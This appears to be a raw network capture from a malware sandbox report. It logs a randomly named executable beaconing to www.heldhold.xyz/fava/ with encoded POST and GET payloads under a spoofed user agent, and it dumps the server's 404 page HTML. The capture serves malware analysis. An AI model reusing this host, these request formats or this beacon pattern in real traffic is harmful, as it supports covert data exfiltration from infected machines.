                                              Sep 25, 2024 12:47:27.411729097 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f
                                              Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a
                                              Sep 25, 2024 12:47:27.411741018 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74
                                              Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1
                                              Sep 25, 2024 12:47:27.411752939 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a>
                                              Sep 25, 2024 12:47:27.411763906 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 6c 69 67
                                              Data Ascii: <li><a class="dropdown-item" href="header4-light.html">Header 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark<
                                              Sep 25, 2024 12:47:27.411773920 CEST556INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65
                                              Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Footers</a> <ul class="dropdown-menu"> <li><a class="
                                              Sep 25, 2024 12:47:27.411787033 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 46 6f 6f 74 65 72 31 2d 6c 69 67 68 74 2e 68 74 6d 6c
                                              Data Ascii: <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-dark.html">Footer 1 Dark</a></li


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.44975167.223.117.189803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:29.288917065 CEST786OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 4e 51 56 6e 77 43 5a 50 55 78 42 6f 62 52 58 58 6e 38 6a 6f 77 74 33 4a 38 4a 66 43 39 32 4a 37 77 4a 30 70 5a 51 33 66 45 46 66 7a 51 4e 2f 4a 50 62 4a 44 4f 4f 6a 57 4a 4b 6f 67 59 6e 37 45 64 54 49 50 39 51 50 4e 2b 43 65 36 77 31 77 7a 36 6e 4c 76 4a 35 78 63 50 6a 66 72 51 45 58 76 33 67 5a 71 45 78 71 7a 53 76 4e 44 44 44 4e 72 66 69 4b 6c 51 44 62 38 4c 68 76 53 43 79 70 76 4e 2b 53 70 6b 62 68 6c 71 33 54 37 41 79 50 4a 57 34 79 61 59 45 30 54 43 2f 64 4a 51 73 46 59 6d 75 62 38 49 62 38 69 34 33 37 70 38 3d
                                              Data Ascii: PR_xXrA=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7AyPJW4yaYE0TC/dJQsFYmub8Ib8i437p8=
                                              Sep 25, 2024 12:47:29.889935017 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:29 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 25, 2024 12:47:29.889986038 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 25, 2024 12:47:29.890003920 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 25, 2024 12:47:29.890019894 CEST672INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                              Sep 25, 2024 12:47:29.890037060 CEST1236INData Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
                                              Sep 25, 2024 12:47:29.890053988 CEST1236INData Raw: 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a
                                              Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" aria-expanded="fal
                                              Sep 25, 2024 12:47:29.890072107 CEST1236INData Raw: 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: es </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-toggle" href="#">He
                                              Sep 25, 2024 12:47:29.890085936 CEST104INData Raw: 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 32 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: item dropdown-toggle" href="#">Header 2</a> <ul
                                              Sep 25, 2024 12:47:29.890101910 CEST1236INData Raw: 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: class="dropdown-menu"> <li><a class="dropdown-item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a cl
                                              Sep 25, 2024 12:47:29.890119076 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                              Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a>
                                              Sep 25, 2024 12:47:29.897145987 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparent</a></li>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.44975267.223.117.189803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:31.831346035 CEST10868OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 46 51 56 55 34 43 59 75 55 78 48 59 62 52 4a 6e 6e 68 6a 6f 77 77 33 4a 30 4e 66 43 77 4c 4a 35 49 4a 30 49 35 51 2f 4f 45 46 55 7a 51 4e 67 35 50 4c 4e 44 4f 62 6a 57 5a 47 6f 67 49 6e 37 45 64 54 49 4e 31 51 4d 5a 71 43 46 36 77 36 78 7a 36 6a 47 50 4a 52 78 63 47 59 66 72 63 36 58 66 58 67 59 4b 30 78 35 78 71 76 43 44 44 42 4f 72 66 36 4b 6c 63 6d 62 38 57 61 76 54 47 55 70 6f 6c 2b 52 2b 55 4e 30 45 43 2f 47 72 63 56 62 5a 75 67 37 35 6c 45 79 51 53 57 5a 59 52 78 47 37 36 75 42 65 70 4b 67 44 6b 4f 69 2f 79 47 2b 4b 7a 2b 32 61 71 2f 72 43 74 4a 39 30 47 65 35 79 51 65 70 76 6e 79 63 39 79 71 51 61 49 76 72 35 37 4e 62 33 65 46 74 34 46 55 65 6b 68 35 4d 50 4d 6d 61 70 63 4d 64 30 6a 4b 42 58 77 4e 66 45 5a 6c 57 46 65 48 39 72 6b 6f 4b 30 41 38 57 6e 48 58 50 45 74 42 59 6a 56 4b 67 76 5a 61 32 47 54 67 57 70 78 4b 4d 70 31 64 48 4f 41 55 70 70 [TRUNCATED]
                                              Data Ascii: PR_xXrA=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjFQVU4CYuUxHYbRJnnhjoww3J0NfCwLJ5IJ0I5Q/OEFUzQNg5PLNDObjWZGogIn7EdTIN1QMZqCF6w6xz6jGPJRxcGYfrc6XfXgYK0x5xqvCDDBOrf6Klcmb8WavTGUpol+R+UN0EC/GrcVbZug75lEyQSWZYRxG76uBepKgDkOi/yG+Kz+2aq/rCtJ90Ge5yQepvnyc9yqQaIvr57Nb3eFt4FUekh5MPMmapcMd0jKBXwNfEZlWFeH9rkoK0A8WnHXPEtBYjVKgvZa2GTgWpxKMp1dHOAUppfkvRo7eoKfLY8t8NLMhxg8dFCmt5JB9hxzAA/4u7/3YloBoLVxPw7IxKP/oOIhSckUrq3OSR059NS25EOLB5LmjR4JQqCXv2303LXeZGE7Pg1i0vHhCLWDWWYnjdPqdSwkZ1frY3E8pgyE+mKc4uRPx4VDocin0sSzwXEK8vz3o6wRiZAuaTcZlaIh++QYVoxuxhlQpw4jQyrWkfh7dLOkFN3DDdakEh8yGE9OYB/+xG1HJd4OEWhM1NlRrcwqg+xVSNEE7l0lp4oX+XqL2/tZqXALX/c7VvPP8l+08U1Q4MMDoOAgqQsoL9IsJFdELiUkDw4m1Mh9exI/pwLIqzfK+cudPcP3ciS33Nc859EogxNrx29EoK9XtDCODnLEHObWRyLbXLnHqWH4MBA0Cyyum/WLaPNR1SPvYQ/RFeIi4/69Y1kyzKWR7EKPyJj3iqwcCvPeI4kD5SxEBA2hjCpwcMH7PcNQoKO/aptffI7HxFkBEa3w6A7UfoM/u3bFHncBF6gklxE8NFOd1QKO1DrHvsFuXgU9kvdjRghGRyh4CZsLYG0mNZU0MXZ3ISGtZtiQ9TfxS0Ao2I21tGNVOYo3vzGiYs1EOU8/bXs+qNGY2usrxMb39BkuuyabWfmw7kDx1QIZv13g/68OjaFmfJwPgt7qCQkfXERI [TRUNCATED]
                                              Sep 25, 2024 12:47:32.412100077 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:32 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 25, 2024 12:47:32.412146091 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 25, 2024 12:47:32.412180901 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 25, 2024 12:47:32.412214041 CEST672INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                              Sep 25, 2024 12:47:32.412250042 CEST1236INData Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
                                              Sep 25, 2024 12:47:32.412281036 CEST224INData Raw: 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a
                                              Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true"
                                              Sep 25, 2024 12:47:32.412313938 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 25, 2024 12:47:32.412348032 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                              Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 25, 2024 12:47:32.412381887 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                              Sep 25, 2024 12:47:32.412508011 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                              Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 25, 2024 12:47:32.417418957 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                              Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.44975367.223.117.189803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:34.367429972 CEST508OUTGET /fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.heldhold.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:34.943494081 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:34 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
